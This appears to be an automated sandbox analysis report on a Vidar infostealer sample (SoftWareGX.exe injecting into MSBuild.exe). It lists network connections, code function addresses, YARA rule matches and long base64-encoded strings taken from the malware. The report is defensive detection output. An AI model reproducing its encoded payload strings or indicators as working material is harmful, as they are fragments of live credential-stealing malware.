                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.16:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.16:49989 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00409692 memcpy,CreateDesktopA,CreateProcessA,Sleep,15_2_00409692

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                .NET source code contains very large strings
                Source: 5.2.SoftWareGX.exe.6b50000.5.raw.unpack, Knvbl.csLong String: Length: 14736
                Source: 5.2.SoftWareGX.exe.3d5a42c.1.raw.unpack, Knvbl.csLong String: Length: 14736
                Source: 5.2.SoftWareGX.exe.3d6b958.2.raw.unpack, Knvbl.csLong String: Length: 14736
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004230D615_2_004230D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00407EA415_2_00407EA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042905115_2_00429051
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042586115_2_00425861
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A87115_2_0041A871
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042507115_2_00425071
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041481115_2_00414811
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042601115_2_00426011
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004188C115_2_004188C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C89115_2_0041C891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004150A115_2_004150A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004168A115_2_004168A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004260A115_2_004260A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004280A115_2_004280A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004278B115_2_004278B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042794115_2_00427941
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042894115_2_00428941
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041415115_2_00414151
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041697115_2_00416971
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041611115_2_00416111
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040391115_2_00403911
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042592115_2_00425921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C9C115_2_0041C9C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004189D115_2_004189D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004149D115_2_004149D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042718115_2_00427181
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042918115_2_00429181
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040319115_2_00403191
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C1A115_2_0041C1A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004151B115_2_004151B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004161B115_2_004161B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A24115_2_0041A241
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C26115_2_0041C261
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426A1115_2_00426A11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425A2115_2_00425A21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00427A2115_2_00427A21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415A3115_2_00415A31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004162E115_2_004162E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041CA8115_2_0041CA81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040328115_2_00403281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041AA9115_2_0041AA91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00418A9115_2_00418A91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00414A9115_2_00414A91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426AA115_2_00426AA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415B4115_2_00415B41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041CB4115_2_0041CB41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041535115_2_00415351
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041AB6115_2_0041AB61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C36115_2_0041C361
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042736115_2_00427361
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425B1115_2_00425B11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A32115_2_0041A321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00427B3115_2_00427B31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004143D115_2_004143D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004263D115_2_004263D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041CBE115_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004243E115_2_004243E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004253E115_2_004253E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426BE115_2_00426BE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00428B9115_2_00428B91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425BB115_2_00425BB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425C4115_2_00425C41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00413C6115_2_00413C61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A41115_2_0041A411
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041541115_2_00415411
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C43115_2_0041C431
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00416C3115_2_00416C31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040343115_2_00403431
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426CC115_2_00426CC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425CE115_2_00425CE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004154F115_2_004154F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415C8115_2_00415C81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042748115_2_00427481
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041649115_2_00416491
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042649115_2_00426491
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004244A115_2_004244A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A4B115_2_0041A4B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00414D4115_2_00414D41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040354115_2_00403541
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042755115_2_00427551
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042955E15_2_0042955E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00428D1115_2_00428D11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040FDC015_2_0040FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C5D115_2_0041C5D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004255E115_2_004255E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041DDE715_2_0041DDE7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415D8115_2_00415D81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00413D8115_2_00413D81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042658115_2_00426581
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041AD9115_2_0041AD91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00424DA115_2_00424DA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00427DA115_2_00427DA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004155B115_2_004155B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041464115_2_00414641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042BE4215_2_0042BE42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415E5115_2_00415E51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041565115_2_00415651
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042465115_2_00424651
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042665115_2_00426651
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00424E6115_2_00424E61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042867115_2_00428671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426E0115_2_00426E01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A61115_2_0041A611
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041662115_2_00416621
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042762115_2_00427621
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425ED115_2_00425ED1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004146E115_2_004146E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415EF115_2_00415EF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004156F115_2_004156F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00414E9115_2_00414E91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426EA115_2_00426EA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C74115_2_0041C741
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042575115_2_00425751
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042CF6015_2_0042CF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425F7115_2_00425F71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042777115_2_00427771
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00424F1115_2_00424F11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042471115_2_00424711
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00414F2115_2_00414F21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00427F2115_2_00427F21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004267C115_2_004267C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00416F8115_2_00416F81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426F9115_2_00426F91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00402FB115_2_00402FB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00424FB115_2_00424FB1
                Source: SoftWareGX.exe, 00000005.00000002.1306078094.0000000006110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamem3uz1vzd.dll4 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1306526422.0000000006B50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMercado.exe0 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMercado.exe0 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameyomkssf4.dll4 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1304719584.0000000001F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamem3uz1vzd.dll4 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1306553287.0000000006B60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameyomkssf4.dll4 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMercado.exe0 vs SoftWareGX.exe
                Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: SoftWareGX.exe, uBQRQemRwragayxWIgNspKbnCcaXv.csBase64 encoded string: 'UjOLnpsOJjNzssPOxvSoj1eKmz8vkCIys4dDTFLHahANWrfYOnRN4T+GbEUicJ0iPvGd8+nwwnYnLgNudsHtBLsqZ00Xo1cdp6i8KFSMIMK5MSLzf5uVjAksjlgO6fC/nv8nrIJaz2T7sF843NNYO9zQsx6M9iZWpG9IXvqOUFY7XElBC3JXOmXV6sMFuF/ofc7/o7kk/KGSyDxOTwDQAEFO5nvwR1VYNlKI1Dcba7Jjz5nx9irdjdPh49J+As5hfc7/o7kk/KFgUNUzr+u1ODSgWHK7L2iCIsRQvQICfjJcv7Q0NY+WMf20fUDUiwRGFrAteBaQC0Ymh4SO4VK4/7ukw+drkc2A6UYwlwPH3oTAqwuUGSFVrfL2uARqPN0uuTb/NHKiPmo+2t9i+WVkyxStZ/HNPDxDi7f4opyBinnlL04xb5iWmx74x7GC3AeXDmpJrIpfCLl3nbKRNfkucR6g3COiRFcbqBi+Ltrp+XxcXQqU9hf2UVaQhUDsNlQArVagZGQrXUeqqevEcSK4LUWAzoKL/515HvjHsYLcB5d1bqbjY5CFmAksjlgO6fC/nv8nrIJaz2TdgpJyw0BJhXw4OZcRsgNwdNvwRwAYhld9zv+juST8oeUeNkGulXthEFI8bZ2aegVEGJE/t1j0L6Fih/BuSIpqX+YD2JZERLqd/Q6iGbvmi+VxFMqHYLqHf3VNoyNr3cR9zv+juST8oQhx8gojIC6QAeGXtwvwFGEPruJ4D9Z1MI++IhThja9tE28xRs5lWOkzsvVM5VXI5MBD6SDiDRk43VG1hY5ZHPd9zv+juST8oRzbvZts4YMCmmEdQugPAEwlbslN6hMpn6nA8VHcFDrcKEgYmxEae0yw/B9rYsv7u6xNrQcYfRyuO1xJQQtyVzpAm4v9QWJdfp1SEdeJMpZL'
                Source: 5.2.SoftWareGX.exe.6b50000.5.raw.unpack, Knvbl.csBase64 encoded string: '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